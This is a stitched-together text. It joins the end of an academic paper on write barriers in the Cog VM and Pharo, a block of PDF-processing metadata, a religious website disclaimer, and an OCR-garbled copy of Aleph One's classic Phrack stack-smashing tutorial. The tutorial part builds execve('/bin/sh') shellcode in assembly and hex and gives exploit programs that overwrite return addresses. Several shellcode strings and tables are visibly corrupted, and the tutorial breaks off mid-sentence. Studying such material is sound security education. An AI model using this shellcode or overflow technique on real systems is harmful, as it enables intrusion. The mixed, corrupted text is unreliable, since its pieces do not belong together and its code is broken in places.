<td>11.5 ±3 nanoseconds per run</td> </tr> <tr> <td>Write Barrier</td> <td>13.6 ±2 nanoseconds per run</td> </tr> </tbody> </table> In this pathological case, as shown on Figure 10, one notices a 18.2% performance overhead. However, the binary tree benchmark, which was larger, calls extensively a similar method (see Figure 11) and does not show any significant overhead. It is therefore unclear if this result means anything on real applications. **Figure 11. Binary tree setter method** ```dolt ShootoutTreeNode>>left: leftChild right: rightChild item: anItem left := leftChild. right := rightChild. item := anItem. ``` I profiled the pathological case and realized the performance overhead was mostly due to the stack frame creation. Indeed, instance variable stores do not require a stack frame without the write barrier, but they do with the write barrier to be able to perform the cannotAssign:withIndex: call-back. Different solutions are considered for this problem, as discussed in the future work section. ### 6. Related work **Immutability.** Other programming languages such as Ada, C++, Java, Perl, Python, Javascript, Racket or Scala support immutable objects. In those cases, an immutable object is an object whose state cannot be modified after it is created. It differs from our approach where at any time, the program can mark or unmark an object as read-only. In the context of Smalltalk where most features are reflexive, it seems the right thing to allow an object to be able to change from immutable to mutable state, and the other way around, using reflexive APIs. **Garbage collector write barrier.** Other people have implemented write barriers in the machine code for efficient garbage collection [9, 10]. Tracing generational GCs require the runtime to maintain a specific invariant: objects referencing other objects from a younger generation need to be remembered. This way, the runtime can mark a generation of objects without scanning older generations, leading to better performance. In this kind of GCs, when an object is stored into an older object, some actions may be taken by the runtime to remember the old object thanks to a write barrier. In addition, many modern GCs are also incremental to limit the impact of garbage collection pauses for the application. Incremental GCs may require additional invariants. For example, in a tri-color marking garbage collector [1], a new invariant is that black and white objects cannot reference each others. In the case of the Cog VM, the runtime now provides both a write barrier for the generational GC and for read-only objects. As discussed in Section 4.3.2, part of the machine code is shared between both write barriers to limit the overhead. As of today, the Cog VM does not feature an incremental GC hence no write barrier is required for this purpose. **High level modification tracker tools.** The main use-case of the write barrier is the implementation of object modification trackers. Others implementation of objects modification trackers are available. The most popular nowadays are the ones made with the Reflectivity framework [5]. On the contrary to our approach where the overhead is close to zero, the other approaches available have a significant overhead as they need to execute additional bytecodes. **Other Smalltalks.** Other Smalltalk dialects, such as VisualWorks Smalltalk and the HPS VM (High Performance Smalltalk Virtual Machine) [6], have a similar features. In the case of VisualWorks, as the VM is a pure-JIT VM (there is no interpreter), the implementation does not require the cannotAssign:withIndex: call-back to return no value (the machine code generated has a specific execution path to take care of it). ### 7. Future Work I discuss in this section multiple performance improvement and features that would be nice in the future release of the Cog VM. #### 7.1 Performance improvements **Stack frame mapping and trampolines.** While profiling code in the VM to look for methods getting slower with the write barrier, it came to light that one could optimize multiple trampolines in the JIT (related and unrelated to read-only objects). Indeed, trampolines such as cannotAssign:withIndex: or mustBeBoolean add strong pressure on register allocation while they are taken infrequently. It would be possible to convert stack frames triggering those trampolines from machine code frame to bytecode interpreter frames lazily, only when one of the unfrequent trampoline is taken. This way, infrequent execution paths would be interpreted, leading to overhead only in rare cases, while the common execution path could be optimized better. **Stack frame creation for setter.** As discussed in Section 5.2, the main remaining slow-down in the current implementation lies with setter methods, *i.e.*, methods only setting the value of one or multiple instance variables. It is possible to change the JIT to generate two paths for such methods. The method would start by testing if the receiver is read-only or not, if it is not the case, which is the most common, a quick path without stack frame creation nor read-only checks can be taken instead of the slow path with stack frame creation and read-only checks. #### 7.2 Features **Read-only contexts.** For simplicity, I enforced all contexts to be writable. It would be interesting to allow context to be read-only, though it is not clear what would be the use-cases. Read-only contexts can’t be executed by the existing VM as code execution requires at least the mutation of the program counter of the context. Hence, such contexts would not be mapped to stack frames and would only exist as normal objects. Execution returning to read-only contexts would fail and Smalltalk code would be able to handle the failure. The only way such contexts could be executed is through a separated runtime directly written by the programmer to correctly execute the code. Work in that direction is going to happen if someone provides a valid use-case. **Modification tracker.** One of the main use-cases of the write barrier is to track object modifications. To do so, one has to implement an in-image framework on top of the write barrier APIs proposed in this paper. The framework has to correctly handle store failures of both primitives such as at:put and instance variable store. **In-image primitive fall-back.** As stated in Section 3.2, all the primitive methods mutating an object need to have their fall-back code updated to raise the correct error. If such primitives fail because of a read-only object, the primitive failure error should be appropriate and not an unrelated error. This has still to be done. ### 8. Conclusion In this paper I have described the implementation of the write barrier in the Cog VM and the Pharo image. According to the multiple evaluations, the feature was introduced --- 5 These trampolines require specific registers to hold specific values to be called and forbid other registers to stay alive across the trampoline calls. with little to no overhead in term of memory footprint and execution time in most applications. Although the overhead is minimal, very uncommon pathological cases still show an execution time overhead of up to 18.2%. I believe the pathological cases overhead could be solved by compiling two paths for setter methods and by falling back to bytecode interpretation on uncommon machine code paths. Hopefully, once polished over months of production and customer feed-back, the write barrier will induce a negligible overhead even in uncommon cases. Acknowledgements I thank Eliot Miranda for helping me implementing the write barrier in the Cog VM and reviewing all my commits. I thank Colin Putney for clarifying the term immutability against write barrier and discussing the implementation in general, as well as Tobias Pape, Jan Van de Sandt, Ryan Macnak, Tudor Girba, Chris Cunningham, Tim Rowledge, Ben Coman, Bert Freudenberg and Denis Kudriashov on the Squeak virtual machine mailing list. This work was supported by Ministry of Higher Education and Research, Nord-Pas de Calais Regional Council, CPER Nord-Pas de Calais/FEDER DATA Advanced data science and technologies 2015-2020. References
{"Source-Url": "https://hal.archives-ouvertes.fr/hal-01356338/file/HAL.pdf", "len_cl100k_base": 10103, "olmocr-version": "0.1.47", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 33814, "total-output-tokens": 10792, "length": "2e13", "weborganizer": {"__label__adult": 0.0003008842468261719, "__label__art_design": 0.0002276897430419922, "__label__crime_law": 0.0002130270004272461, "__label__education_jobs": 0.00031495094299316406, "__label__entertainment": 4.875659942626953e-05, "__label__fashion_beauty": 0.00011855363845825197, "__label__finance_business": 0.00014829635620117188, "__label__food_dining": 0.00027489662170410156, "__label__games": 0.0003902912139892578, "__label__hardware": 0.000957489013671875, "__label__health": 0.00031685829162597656, "__label__history": 0.00018930435180664065, "__label__home_hobbies": 6.979703903198242e-05, "__label__industrial": 0.00029850006103515625, "__label__literature": 0.00018310546875, "__label__politics": 0.00021135807037353516, "__label__religion": 0.00039267539978027344, "__label__science_tech": 0.008758544921875, "__label__social_life": 6.389617919921875e-05, "__label__software": 0.00437164306640625, "__label__software_dev": 0.9814453125, "__label__sports_fitness": 0.0002390146255493164, "__label__transportation": 0.00040221214294433594, "__label__travel": 0.00016868114471435547}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 47045, 0.02101]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 47045, 0.61974]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 47045, 0.89144]], "google_gemma-3-12b-it_contains_pii": [[0, 970, false], [970, 4711, null], [4711, 10259, null], [10259, 14521, null], [14521, 19107, null], [19107, 24443, null], [24443, 28953, null], [28953, 34311, null], [34311, 38606, null], [38606, 44187, null], [44187, 47045, null]], "google_gemma-3-12b-it_is_public_document": [[0, 970, true], [970, 4711, null], [4711, 10259, null], [10259, 14521, null], [14521, 19107, null], [19107, 24443, null], [24443, 28953, null], [28953, 34311, null], [34311, 38606, null], [38606, 44187, null], [44187, 47045, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 47045, null]], "pdf_page_numbers": [[0, 970, 1], [970, 4711, 2], [4711, 10259, 3], [10259, 14521, 4], [14521, 19107, 5], [19107, 24443, 6], [24443, 28953, 7], [28953, 34311, 8], [34311, 38606, 9], [38606, 44187, 10], [44187, 47045, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 47045, 0.19322]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
c3186ec3f19b11eac5280a42994bbe8ce433a177
Verily I say unto you, Inasmuch as ye have done it unto one of the least of these my brethren, ye have done it unto me. (Matthew 25:40) This document is provided for reference purposes only. Statements in this document reflect the opinions of Reactor Core staff or the owner. If you find ought to disagree that as it ought be. Train your mind to test every thought, ideology, train of reas and claim to truth. There is no justice when even a single voice goes unheard. Thessalonians 5:21, 1 John 4:1-3, John 14:26, John 16:26, Revelation 12:10, Pr 14:15, Proverbs 18:13) SMASHING THE STACK FOR FUN AND PROFIT by Aleph One <aleph1@underground.org> published in Phrack Volume 7, Issue 49 File 14 of 16 `smash the stack` [C programming] n. On many C implementations it is possible to corrupt the execution stack by writing past the end of an array declared auto in a routine. Code that does this is said to smash the stack, and can cause return from the routine to jump to a random address. This can produce some of the most insidious data-dependent bugs known to mankind. Variants include trash the stack, scribble the stack, mangle the stack; the term mung the stack is not used, as this is never done intentionally. See spam; see also alias bug, fandango on core, memory leak, precedence lossage, overrun screw. INTRODUCTION Over the last few months there has been a large increase of buffer overflow vulnerabilities being both discovered and exploited. Examples of these are syslog, splitvt, sendmail 8.7.5, Linux/FreeBSD mount, Xt library, at, etc. This paper attempts to explain what buffer overflows are, and how their exploits work. Basic knowledge of assembly is required. An understanding of virtual memory concepts, and experience with gdb are very helpful but not necessary. We also assume we are working with an Intel x86 CPU, and that the operating system is Linux. Some basic definitions before we begin: A buffer is simply a contiguous block of computer memory that holds multiple instances of the same data type. C programmers normally associate with the word buffer arrays. Most commonly, character arrays. Arrays, like all variables in C, can be declared either static or dynamic. Static variables are allocated at load time on the data segment. Dynamic variables are allocated at run time on the stack. To overflow is to flow, or fill over the top, brims, or bounds. We will concern ourselves only with the overflow of dynamic buffers, otherwise known as stack- based buffer overflows. **PROCESS MEMORY ORGANIZATION** To understand what stack buffers are we must first understand how a process is organized in memory. Processes are divided into three regions: Text, Data, and Stack. We will concentrate on the stack region, but first a small overview of the other regions is in order. The text region is fixed by the program and includes code (instructions) and read-only data. This region corresponds to the text section of the executable file. This region is normally marked read-only and any attempt to write to it will result in a segmentation violation. The data region contains initialized and uninitialized data. Static variables are stored in this region. The data region corresponds to the data-bss sections of the executable file. Its size can be changed with the brk(2) system call. If the expansion of the bss data or the user stack exhausts available memory, the process is blocked and is rescheduled to run again with a larger memory space. New memory is added between the data and stack segments. ![Process Memory Regions Diagram](http://reactor-core.org/stack-smashing.html) **WHAT IS A STACK?** A stack is an abstract data type frequently used in computer science. A stack of objects has the property that the last object placed on the stack will be the first object removed. This property is commonly referred to as last in, first out queue, or a LIFO. Several operations are defined on stacks. Two of the most important are PUSH and POP. PUSH adds an element at the top of the stack. POP, in contrast, reduces the stack size by one by removing the last element at the top of the stack. **WHY DO WE USE A STACK?** Modern computers are designed with the need of high-level languages in mind. The most important technique for structuring programs introduced by high-level languages is the procedure or function. From one point of view, a procedure call alters the flow of control just as a jump does, but unlike a jump, when finished performing its task, a function returns control to the statement or instruction following the call. This high-level abstraction is implemented with the help of the stack. The stack is also used to dynamically allocate the local variables used in functions, to pass parameters to the functions, and to return values from the function. **THE STACK REGION** A stack is a contiguous block of memory containing data. A register called the stack pointer (SP) points to the top of the stack. The bottom of the stack is at a fixed address. Its size is dynamically adjusted by the kernel at run time. The CPU implements instructions to PUSH onto and POP off of the stack. The stack consists of logical stack frames that are pushed when calling a function and popped when returning. A stack frame contains the parameters to a function, its local variables, and the data necessary to recover the previous stack frame, including the value of the instruction pointer at the time of the function call. Depending on the implementation the stack will either grow down (towards lower memory addresses), or up. In our examples we'll use a stack that grows down. This is the way the stack grows on many computers including the Intel, Motorola, SPARC and MIPS processors. The stack pointer (SP) is also implementation dependent. It may point to the last address on the stack, or to the next free available address after the stack. For our discussion we'll assume it points to the last address on the stack. In addition to the stack pointer, which points to the top of the stack (lowest numerical address), it is often convenient to have a frame pointer (FP) which points to a fixed location within a frame. Some texts also refer to it as a local base pointer (LB). In principle, local variables could be referenced by giving their offsets from SP. However, as words are pushed onto the stack and popped from the stack, these offsets change. Although in some cases the compiler can keep track of the number of words on the stack and thus correct the offsets, in some cases it cannot, and in all cases considerable administration is required. Furthermore, on some machines, such as Intel-based processors, accessing a variable at a known distance from SP requires multiple instructions. Consequently, many compilers use a second register, FP, for referencing both local variables and parameters because their distances from FP do not change with PUSHes and POPs. On Intel CPUs, BP (EBP) is used for this purpose. On the Motorola CPUs, any address register except A7 (the stack pointer) will do. Because the way our stack grows, actual parameters have positive offsets and local variables have negative offsets from FP. The first thing a procedure must do when called is save the previous FP (so it can be restored at procedure exit). Then it copies SP into FP to create the new FP, and advances SP to reserve space for the local variables. This code is called the procedure prolog. Upon procedure exit, the stack must be cleaned up again, something called the procedure epilog. The Intel ENTER and LEAVE instructions and the Motorola LINK and UNLINK instructions, have been provided to do most of the procedure prolog and epilog work efficiently. Let us see what the stack looks like in a simple example: ```c example1.c: void function(int a, int b, int c) { char buffer1[5]; char buffer2[10]; } void main() { function(1,2,3); } ``` To understand what the program does to call function() we compile it with gcc using the -S switch to generate assembly code output: ``` $ gcc -S -o example1.s example1.c ``` By looking at the assembly language output we see that the call to function() is translated to: ``` pushl $3 pushl $2 pushl $1 call function ``` This pushes the 3 arguments to function backwards into the stack, and calls function(). The instruction 'call' will push the instruction pointer (IP) onto the stack. We'll call the saved IP the return address (RET). The first thing done in function is the procedure prolog: ``` pushl %ebp movl %esp,%ebp subl $20,%esp ``` This pushes EBP, the frame pointer, onto the stack. It then copies the current SP onto EBP, making it the new FP pointer. We'll call the saved FP pointer SFP. It then allocates space for the local variables by subtracting their size from SP. We must remember that memory can only be addressed in multiples of the word size. A word in our case is 4 bytes, or 32 bits. So our 5 byte buffer is really going to take 8 bytes (2 words) of memory, and our 10 byte buffer is going to take 12 bytes (3 words) of memory. That is why SP is being subtracted by 20. With that in mind our stack looks like this when function() is called (each space represents a byte): ``` <------ buffer2 buffer1 sfp ret a b c ``` ``` ``` **BUFFER OVERFLOW** A buffer overflow is the result of stuffing more data into a buffer than it can handle. How can this often found programming error can be taken advantage to execute arbitrary code? Let's look at another example: ```c example2.c void function(char *str) { char buffer[16]; strcpy(buffer,str); } void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); } ``` This is program has a function with a typical buffer overflow coding error. The function copies a supplied string without bounds checking by using `strcpy()` instead of `strncpy()`. If you run this program you will get a segmentation violation. Let's see what its stack looks when we call function: ``` <------ buffer sfp ret *str ``` ``` ``` http://reactor-core.org/stack-smashing.html What is going on here? Why do we get a segmentation violation? Simple. strcpy() is coping the contents of *str (larger_string[]) into buffer[] until a null character is found on the string. As we can see buffer[] is much smaller than *str. buffer[] is 16 bytes long, and we are trying to stuff it with 256 bytes. This means that all 250 bytes after buffer in the stack are being overwritten. This includes the SFP, RET, and even *str! We had filled large_string with the character 'A'. It's hex character value is 0x41. That means that the return address is now 0x41414141. This is outside of the process address space. That is why when the function returns and tries to read the next instruction from that address you get a segmentation violation. So a buffer overflow allows us to change the return address of a function. In this way we can change the flow of execution of the program. Lets go back to our first example and recall what the stack looked like: ``` +---+---+---+---+---+---+---+---+---+ | | | | | | | | | | | | | | | | | | | | |---+---+---+---+---+---+---+---+---+ ``` Lets try to modify our first example so that it overwrites the return address, and demonstrate how we can make it execute arbitrary code. Just before buffer1[] on the stack is SFP, and before it, the return address. That is 4 bytes pass the end of buffer1[]. But remember that buffer1[] is really 2 word so its 8 bytes long. So the return address is 12 bytes from the start of buffer1[]. We'll modify the return value in such a way that the assignment statement 'x = 1;' after the function call will be jumped. To do so we add 8 bytes to the return address. Our code is now: example3.c: ``` void function(int a, int b, int c) { char buffer1[5]; char buffer2[10]; int *ret; ret = buffer1 + 12; (*ret) += 8; } void main() { int x; x = 0; function(1,2,3); x = 1; printf("%d\n",x); } ``` What we have done is add 12 to buffer1[]'s address. This new address is where the return address is stored. We want to skip pass the assignment to the printf call. How did we know to add 8 to the return address? We used a test value first (for example 1), compiled the program, and then started gdb: ``` [aleph1]$ gdb example3 GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc... (no debugging symbols found)... (gdb) disassemble main Dump of assembler code for function main: 0x8000490 <main>: pushl %ebp 0x8000491 <main+1>: movl %esp,%ebp 0x8000493 <main+3>: subl $0x4,%esp 0x8000496 <main+6>: movl $0x0,0xfffffffc(%ebp) 0x800049d <main+13>: pushl $0x3 0x800049f <main+15>: pushl $0x2 0x80004af <main+17>: pushl $0x1 0x80004a3 <main+19>: call 0x8000470 <function> 0x80004a8 <main+24>: addl $0xc,%esp 0x80004b2 <main+34>: movl 0xfffffffc(%ebp),%eax 0x80004b5 <main+37>: pushl %eax 0x80004b6 <main+38>: pushl $0x80004f8 0x80004bb <main+43>: call 0x8000378 <printf> 0x80004c0 <main+48>: addl $0x8,%esp 0x80004c3 <main+51>: movl %ebp,%esp 0x80004c5 <main+53>: popl %ebp 0x80004c6 <main+54>: ret 0x80004c7 <main+55>: nop ``` We can see that when calling function() the RET will be 0x8004a8, and we want to jump past the assignment at 0x8004ab. The next instruction we want to execute is the at 0x8004b2. A little math tells us the distance is 8 bytes. **SHELL CODE** So now that we know that we can modify the return address and the flow of execution, what program do we want to execute? In most cases we'll simply want the program to spawn a shell. From the shell we can then issue other commands as we wish. But what if there is no such code in the program we are trying to exploit? How can we place arbitrary instruction into its address space? The answer is to place the code with are trying to execute in the buffer we are overflowing, and overwrite the return address so it points back into the buffer. Assuming the stack starts at address 0xFF, and that S stands for the code we want to execute the stack would then look like this: ``` bottom of DDDDDDDDEEEEEEEEEEEE FFFF FFFF FFFF FFFF FFFF top of ``` The code to spawn a shell in C looks like: ``` #include <stdio.h> void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } ``` To find out what does it looks like in assembly we compile it, and start up gdb. Remember to use the `-static` flag. Otherwise the actual code the for the `execve` system call will not be included. Instead there will be a reference to dynamic C library that would normally would be linked in at load time. ``` [gdb]$ disassemble main Dump of assembler code for function main: 0x8000130 <main>: pushl %ebp 0x8000131 <main+1>: movl %esp,%ebp 0x8000133 <main+3>: subl $0x8,%esp 0x8000136 <main+6>: movl $0x80027b8,0xfffffff8(%ebp) 0x800013d <main+13>: movl $0x0,0xfffffffc(%ebp) 0x8000144 <main+20>: pushl $0x0 0x8000146 <main+22>: leal 0xfffffff8(%ebp),%eax 0x8000149 <main+25>: pushl %eax 0x800014a <main+26>: movl 0xfffffff8(%ebp),%eax 0x800014d <main+30>: call 0x80002bc <__execve> 0x8000153 <main+35>: addl $0xc,%esp 0x8000156 <main+38>: movl %eax,%eax 0x8000159 <main+41>: ret End of assembler dump. ``` Lets try to understand what is going on here. We'll start by studying main: ``` 0x8000130 <main>: pushl %ebp 0x8000131 <main+1>: movl %esp,%ebp 0x8000133 <main+3>: subl $0x8,%esp This is the procedure prelude. It first saves the old frame pointer, makes the current stack pointer the new frame pointer, and leaves space for the local variables. In this case its: char *name[2]; or 2 pointers to a char. Pointers are a word long, so it leaves space for two words (8 bytes). 0x8000136 <main+6>: movl $0x80027b8,0xfffffff8(%ebp) We copy the value 0x80027b8 (the address of the string "/bin/sh") into the first pointer of name[]. This is equivalent to: name[0] = "/bin/sh"; 0x800013d <main+13>: movl $0x0,0xfffffff8(%ebp) We copy the value 0x0 (NULL) into the seconds pointer of name[]. This is equivalent to: ``` name[1] = NULL; The actual call to execve() starts here. 0x8000144 <main+20>: pushl $0x0 We push the arguments to execve() in reverse order onto the stack. We start with NULL. 0x8000146 <main+22>: leal 0xffffffff8(%ebp),%eax We load the address of name[] into the EAX register. 0x8000149 <main+25>: pushl %eax We push the address of name[] onto the stack. 0x800014a <main+26>: movl 0xffffffff8(%ebp),%eax We load the address of the string "/bin/sh" into the EAX register. 0x800014d <main+29>: pushl %eax We push the address of the string "/bin/sh" onto the stack. 0x800014e <main+30>: call 0x80002bc <__execve> Call the library procedure execve(). The call instruction pushes the IP onto the stack. Now execve(). Keep in mind we are using a Intel based Linux system. The syscall details will change from OS to OS, and from CPU to CPU. Some will pass the arguments on the stack, others on the registers. Some use a software interrupt to jump to kernel mode, others use a far call. Linux passes its arguments to the system call on the registers, and uses a software interrupt to jump into kernel mode. 0x80002bc <__execve>: pushl %ebp 0x80002bd <__execve+1>: movl %esp,%ebp 0x80002bf <__execve+3>: pushl %ebx The procedure prelude. 0x80002c0 <__execve+4>: movl $0xb,%eax Copy 0xb (11 decimal) onto the stack. This is the index into the syscall table. 11 is execve. 0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx Copy the address of "/bin/sh" into EBX. 0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx Copy the address of name[] into ECX. 0x80002cb <__execve+15>: movl 0x10(%ebp),%edx Copy the address of the null pointer into %edx. 0x80002ce <__execve+18>: int $0x80 Change into kernel mode. So as we can see there is not much to the execve() system call. All we need to do is: a. Have the null terminated string "/bin/sh" somewhere in memory. b. Have the address of the string "/bin/sh" somewhere in memory followed by a null long word. c. Copy 0xb into the EAX register. d. Copy the address of the address of the string "/bin/sh" into the EBX register. e. Copy the address of the string "/bin/sh" into the ECX register. f. Copy the address of the null long word into the EDX register. g. Execute the int $0x80 instruction. But what if the execve() call fails for some reason? The program will continue fetching instructions from the stack, which may contain random data! The program will most likely core dump. We want the program to exit cleanly if the execve syscall fails. To accomplish this we must then add a exit syscall after the execve syscall. What does the exit syscall looks like? exit.c ```c #include <stdlib.h> void main() { exit(0); } ``` [aleph1]$ gcc -o exit -static exit.c [aleph1]$ gdb exit GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.15 (1586-unknown-linux), Copyright 1995 Free Software Foundation, Inc... (no debugging symbols found)... (gdb) disassemble _exit Dump of assembler code for function _exit: 0x800034c <_exit>: pushl %ebp 0x800034d <_exit+1>: movl %esp,%ebp 0x800034f <_exit+3>: pushl %ebx 0x8000350 <_exit+4>: movl $0x1,%eax ``` http://reactor-core.org/stack-smashing.html 28-Nov-06 The exit syscall will place 0x1 in EAX, place the exit code in EBX, and execute "int 0x80". That's it. Most applications return 0 on exit to indicate no errors. We will place 0 in EBX. Our list of steps is now: a. Have the null terminated string "/bin/sh" somewhere in memory. b. Have the address of the string "/bin/sh" somewhere in memory followed by a null long word. c. Copy 0xb into the EAX register. d. Copy the address of the address of the string "/bin/sh" into the EBX register. e. Copy the address of the string "/bin/sh" into the ECX register. f. Copy the address of the null long word into the EDX register. g. Execute the int $0x80 instruction. h. Copy 0x1 into the EAX register. i. Copy 0x0 into the EBX register. j. Execute the int $0x80 instruction. Trying to put this together in assembly language, placing the string after the code, and remembering we will place the address of the string, and null word after the array, we have: ``` movl string_addr,string_addr_addr movb $0x0,null_byte_addr movl $0x0,null_addr movl $0xb,%eax movl string_addr,%ebx leal string_addr,%ecx leal null_string,%edx int $0x80 movl $0x1, %eax movl $0x0, %ebx int $0x80 /bin/sh string goes here. ``` The problem is that we don't know where in the memory space of the program we are trying to exploit the code (and the string that follows it) will be placed. One way around it is to use a JMP, and a CALL instruction. The JMP and CALL instructions can use IP relative addressing, which means we can jump to an offset from the current IP without needing to know the exact address of where in memory we want to jump to. If we place a CALL instruction right before the "/bin/sh" string, and a JMP instruction to it, the strings address will be pushed onto the stack as the return address when CALL is executed. All we need then is to copy the return address into a register. The CALL instruction can simply call the start of our code above. Assuming now that J stands for the JMP instruction, C for the CALL instruction, and s for the string, the execution flow would now be: ``` <table> <thead> <tr> <th></th> </tr> </thead> <tbody> <tr> <td>bottom of DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF top of</td> </tr> <tr> <td>memory 89ABCDDEF0123456789AB CDEF 0123 4567 89AB CDEF memory</td> </tr> <tr> <td>buffer sf p ret a b c</td> </tr> </tbody> </table> <------ [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03] --------| ^| | ^| | ||| __________ ||_________ | (1) (2) ||___________|| |___________| (3) ``` With this modifications, using indexed addressing, and writing down how many bytes each instruction takes our code looks like: ``` jmp offset-to-call # 2 bytes popl %esi # 1 byte movl %esi,array-offset(%esi) # 3 bytes movb $0x0,nullbyteoffset(%esi)# 4 bytes movl $0x0,null-offset(%esi) # 7 bytes movl $0xb,%eax # 5 bytes movl %esi,%ebx # 2 bytes leal array-offset,(%esi),%ecx # 3 bytes leal null-offset(%esi),%edx # 3 bytes int $0x80 # 2 bytes movl $0x1, %eax # 5 bytes movl $0x0, %ebx # 5 bytes int $0x80 # 2 bytes call offset-to-popl # 5 bytes ``` /bin/sh string goes here. Calculating the offsets from jmp to call, from call to popl, from the string address to the array, and from the string address to the null long word, we now have: ``` jmp 0x26 # 2 bytes popl %esi # 1 byte movl %esi,0x8(%esi) # 3 bytes movb $0x0,0x7(%esi) # 4 bytes movl $0x0,0xc(%esi) # 7 bytes movl $0xb,%eax # 5 bytes ``` Looks good. To make sure it works correctly we must compile it and run it. But there is a problem. Our code modifies itself, but most operating system mark code pages read-only. To get around this restriction we must place the code we wish to execute in the stack or data segment, and transfer control to it. To do so we will place our code in a global array in the data segment. We need first a hex representation of the binary code. Lets compile it first, and then use gdb to obtain it. shellcodeasm.c ```c void main() { __asm__ ( " jmp 0x2a popl %esi movl %esi,0x8(%esi) movb $0x0,0x7(%esi) movl $0x0,0xc(%esi) movl $0xb,%eax movl %esi,%ebx leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 movl $0x1, %eax movl $0x0, %ebx int $0x80 call -0x2b .string "/bin/sh" " ); } ``` [aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c [aleph1]$ gdb shellcodeasm GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc... (gdb) disassemble main Dump of assembler code for function main: 0x8000130 <main>: pushl %ebp 0x8000131 <main+1>: movl %esp,%ebp 0x8000133 <main+3>: jmp 0x800015f <main+47> 0x8000135 <main+5>: popl %esi It works! But there is an obstacle. In most cases we'll be trying to overflow a character buffer. As such any null bytes in our shellcode will be considered the end of the string, and the copy will be terminated. There must be no null bytes in the shellcode for the exploit to work. Let's try to eliminate the bytes (and at the same time make it smaller). Problem instruction: | Substitute with: ---|--- `movb $0x0,0x7(%esi)` | `xorl %eax,%eax` `movl $0x0,0xc(%esi)` | `movb %eax,0x7(%esi)` `movl %eax,0xc(%esi)` | `movl %eax,0xc(%esi)` `movl $0xb,%eax` | `movb $0xb,%al` `movl $0x1,%eax` | `xorl %ebx,%ebx` `movl $0x0,%ebx` | `movl %ebx,%eax` `inc %eax` | `inc %eax` Our improved code: ``` shellcodeasm2.c void main() { __asm__(" jmp 0x1f # 2 bytes popl %esi # 1 byte movl %esi,0x8(%esi) # 3 bytes xorl %eax,%eax # 2 bytes movb %eax,0x7(%esi) # 3 bytes movl %eax,0xc(%esi) # 3 bytes movb $0xb,%al # 2 bytes movl %esi,%ebx # 2 bytes leal 0x8(%esi),%ecx # 3 bytes leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes xorl %ebx,%ebx # 2 bytes movl %ebx,%eax # 2 bytes inc %eax # 1 bytes int $0x80 # 2 bytes call -0x24 # 5 bytes .string "/bin/sh" "); } ``` And our new test program: ``` testsc2.c char shellcode[] = "/xeb\xf3\x8d\xf4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "/x80\xe8\xdc\xff\xf8\xff/bin/sh"; void main() { int *ret; ret = (int *)&ret + 2; ``` (*)ret) = (int)shellcode; } [aleph1]$ gcc -o testsc2 testsc2.c [aleph1]$ ./testsc2 $ exit [aleph1]$ WRITING AN EXPLOIT (OR HOW TO MUNG THE STACK) Lets try to pull all our pieces together. We have the shellcode. We know it must be part of the string which we'll use to overflow the buffer. We know we must point the return address back into the buffer. This example will demonstrate these points: overflow1.c char shellcode[] = "\xeb\xf1\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xdb\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer,large_string); } [aleph1]$ gcc -o exploit1 exploit1.c [aleph1]$ ./exploit1 $ exit [aleph1]$ What we have done above is filled the array large_string[] with the address of buffer[], which is where our code will be. Then we copy our shellcode into the beginning of the large_string string. strcpy() will then copy large_string onto buffer without doing any bounds checking, and will overflow the return address, overwriting it with the address where our code is now located. Once we reach the end of main and it tried to return it jumps to our code, and execs a shell. The problem we are faced when trying to overflow the buffer of another program is trying to figure out at what address the buffer (and thus our code) will be. The answer is that for every program the stack will start at the same address. Most programs 